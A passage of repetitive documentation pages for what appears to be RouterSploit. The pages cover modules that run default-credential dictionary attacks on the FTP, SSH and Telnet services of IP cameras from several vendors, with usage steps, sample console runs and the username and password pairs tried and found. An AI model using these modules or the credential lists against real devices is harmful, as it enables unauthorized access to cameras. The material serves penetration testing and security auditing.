Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/basler/telnet_default_creds rsf (Basler Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Basler Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/brickcom/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Brickcom Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/brickcom/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/brickcom/ftp_default_creds rsf (Brickcom Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Brickcom Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... 
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/brickcom/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Brickcom Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/brickcom/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/brickcom/ssh_default_creds rsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Brickcom Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/brickcom/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Brickcom Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/brickcom/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/brickcom/telnet_default_creds rsf (Brickcom Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Brickcom Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/canon/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Canon Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/canon/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/canon/ftp_default_creds rsf (Canon Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Canon Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/canon/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Canon Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/canon/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/canon/ssh_default_creds rsf (Canon Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Canon Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... 
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/canon/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Canon Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/canon/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/canon/telnet_default_creds rsf (Canon Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Canon Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/cisco/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/cisco/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/cisco/ftp_default_creds rsf (Cisco Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/cisco/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/cisco/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. 
If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/cisco/ssh_default_creds rsf (Cisco Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/cisco/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/cisco/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/cisco/telnet_default_creds rsf (Cisco Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/dlink/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/dlink/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/dlink/ftp_default_creds rsf (D-Link Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found!
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/dlink/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/dlink/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/dlink/ssh_default_creds rsf (D-Link Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/dlink/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/dlink/telnet_default_creds` 3. 
Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/dlink/telnet_default_creds rsf (D-Link Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/geovision/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against GeoVision Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/geovision/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/geovision/ftp_default_creds rsf (GeoVision Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (GeoVision Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/geovision/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against GeoVision Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/geovision/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/geovision/ssh_default_creds rsf (GeoVision Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (GeoVision Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/geovision/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against GeoVision Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/geovision/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/geovision/telnet_default_creds rsf (GeoVision Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (GeoVision Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/grandstream/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Grandstream Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/grandstream/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/grandstream/ftp_default_creds rsf (Grandstream Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Grandstream Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/grandstream/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Grandstream Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/grandstream/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/grandstream/ssh_default_creds rsf (Grandstream Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Grandstream Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/grandstream/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Grandstream Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/grandstream/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/grandstream/telnet_default_creds rsf (Grandstream Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Grandstream Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/hikvision/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Hikvision Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/hikvision/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/hikvision/ftp_default_creds rsf (Hikvision Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Hikvision Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/hikvision/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Hikvision Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/hikvision/ssh_default_creds` 3. Do: `set target [TargetIP]` 4.
Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/hikvision/ssh_default_creds rsf (Hikvision Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Hikvision Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/hikvision/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Hikvision Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/hikvision/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/hikvision/telnet_default_creds rsf (Hikvision Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Hikvision Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/honeywell/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Honeywell Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/honeywell/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/honeywell/ftp_default_creds rsf (Honeywell Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Honeywell Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found!
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/honeywell/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Honeywell Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/honeywell/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/honeywell/ssh_default_creds rsf (Honeywell Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Honeywell Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/honeywell/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Honeywell Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/honeywell/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/honeywell/telnet_default_creds rsf (Honeywell Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Honeywell Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/iqinvision/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IQInvision Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/iqinvision/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/iqinvision/ftp_default_creds rsf (IQInvision Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IQInvision Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting...
